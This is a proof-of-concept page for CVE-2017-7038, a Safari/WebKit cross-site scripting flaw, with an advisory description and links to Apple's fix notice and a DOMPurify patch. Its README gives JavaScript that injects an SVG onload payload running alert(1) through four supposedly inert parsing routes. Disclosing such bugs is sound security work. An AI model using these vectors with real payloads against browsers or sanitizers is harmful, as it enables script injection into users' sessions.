CVE-2017-7038 PoC — WebKit cross-site scripting vulnerability in multiple Apple products

Source
Associated Vulnerability
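Title: WebKit cross-site scripting vulnerability in multiple Apple products (CVE-2017-7038)
Description: Apple iOS, Safari and tvOS are all products of the American company Apple. Apple iOS is an operating system developed for mobile devices; Safari is a web browser and the default browser shipped with the Mac OS X and iOS operating systems; tvOS is a smart TV operating system. WebKit is an open-source web browser engine developed by the KDE community and currently used by browsers such as Apple Safari and Google Chrome. The WebKit component in multiple Apple products contains a cross-site scripting vulnerability. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. The following products and versions are affected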
Description
Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923
Readme
# CVE-2017-7038
Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923

**Document implementation XSS vulnerability**

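```
// SVG markup carrying an inline onload event handler
var payload = '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>';

// 1. innerHTML on a <body> element that is not attached to the page
document.createElement('body').innerHTML = payload;

// 2. write() into a document created by document.implementation
document.implementation.createHTMLDocument().write(payload);

// 3. DOMParser parsing the markup as text/html
new DOMParser().parseFromString(payload, 'text/html');

// 4. innerHTML on the body of a document returned by XMLHttpRequest
var xhr = new XMLHttpRequest();
xhr.responseType = 'document';
xhr.open('GET', 'data:text/html,', false);
xhr.send(null);
xhr.response.body.innerHTML = payload;
```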

Authors: [@ansjdnakjdnajkd](https://twitter.com/ansjdnakjdnajkd) and [@ShikariSenpai](https://twitter.com/ShikariSenpai)

Thanks and fix also at https://github.com/cure53/DOMPurify/releases/tag/0.8.7